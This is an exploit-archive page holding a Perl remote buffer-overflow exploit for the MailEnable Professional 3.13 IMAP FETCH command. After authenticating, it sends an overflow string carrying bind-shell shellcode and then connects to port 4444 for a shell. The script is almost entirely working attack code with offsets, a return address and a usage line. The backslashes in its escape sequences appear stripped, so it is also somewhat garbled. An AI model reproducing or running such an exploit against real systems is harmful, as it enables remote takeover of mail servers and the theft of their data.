MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit
# Published : 2008-03-14
# Author : haluznik
# Previous Title : CA BrightStor ARCserve Backup r11.5 ActiveX Remote BOF Exploit
# Next Title : NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit

#!/usr/bin/perl

# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
#
# Bind Shell POC Exploit for Win2K SP4 pro English
#
# Found by   : Luigi Auriemma
# Advisory   : http://aluigi.altervista.org/adv/maildisable-adv.txt
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 10.3.2008 ..enjoy!:]
# =================================================================


use IO::Socket;

print "n [*] MailEnable Professional 3.13 imap remote exploit";
print "n [*] exploit by haluznik | bug discovered by Luigi Auriemmann";

if (@ARGV < 3)
{
 print " [!] Use: perl imap.pl [Host] [User] [Pass]n";
 exit;
}

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

my $port = "143";

# metasploit shellcode port 4444
# bad char: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode=
"x2bxc9x66x81xe9xb0xffxe8xffxffxffxffxc0x5ex81x76".
"x0exe6x02xe4x6fx83xeexfcxe2xf4x1ax68x0fx22x0exfb".
"x1bx90x19x62x6fx03xc2x26x6fx2axdax89x98x6ax9ex03".
"x0bxe4xa9x1ax6fx30xc6x03x0fx26x6dx36x6fx6ex08x33".
"x24xf6x4ax86x24x1bxe1xc3x2ex62xe7xc0x0fx9bxddx56".
"xc0x47x93xe7x6fx30xc2x03x0fx09x6dx0exafxe4xb9x1e".
"xe5x84xe5x2ex6fxe6x8ax26xf8x0ex25x33x3fx0bx6dx41".
"xd4xe4xa6x0ex6fx1fxfaxafx6fx2fxeex5cx8cxe1xa8x0c".
"x08x3fx19xd4x82x3cx80x6axd7x5dx8ex75x97x5dxb9x56".
"x1bxbfx8exc9x09x93xddx52x1bxb9xb9x8bx01x09x67xef".
"xecx6dxb3x68xe6x90x36x6ax3dx66x13xafxb3x90x30x51".
"xb7x3cxb5x51xa7x3cxa5x51x1bxbfx80x6axf5x33x80x51".
"x6dx8ex73x6ax40x75x96xc5xb3x90x30x68xf4x3exb3xfd".
"x34x07x42xafxcax86xb1xfdx32x3cxb3xfdx34x07x03x4b".
"x62x26xb1xfdx32x3fxb2x56xb1x90x36x91x8cx88x9fxc4".
"x9dx38x19xd4xb1x90x36x64x8ex0bx80x6ax87x02x6fxe7".
"x8ex3fxbfx2bx28xe6x01x68xa0xe6x04x33x24x9cx4cxfc".
"xa6x42x18x40xc8xfcx6bx78xdcxc4x4dxa9x8cx1dx18xb1".
"xf2x90x93x46x1bxb9xbdx55xb6x3exb7x53x8ex6exb7x53".
"xb1x3ex19xd2x8cxc2x3fx07x2ax3cx19xd4x8ex90x19x35".
"x1bxbfx6dx55x18xecx22x66x1bxb9xb4xfdx34x07x16x88".
"xe0x30xb5xfdx32x90x36x02xe4x6f";

my $buff = "A" x 997 . "xbbxedx4fx7c" . "x90" x 20 . $shellcode;

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die " [-] cannot connect to host!n";

recv($socket, $reply, 1024, 0);
print " [i] " . $reply;
print " [+] logging..n";

$exploit = "a001 LOGIN " . $user ." " . $pass ."rn";
send $socket, $exploit, 0;
recv($socket, $reply, 1024, 0);
print " [i] " . $reply;

$exploit = "a002 SELECT INBOX" ."rn";
send $socket, $exploit, 0;

print " [+] sending evil payload..n";

$exploit = "a003 FETCH 1:4 " . $buff ."rn";
send $socket, $exploit, 0;

print " [*] exploiting done!n";
print " [*] connecting to port 4444 of $hostn";
sleep(6);
system("telnet $host 4444");

close $socket;
exit;

# www.Syue.com [2008-03-14]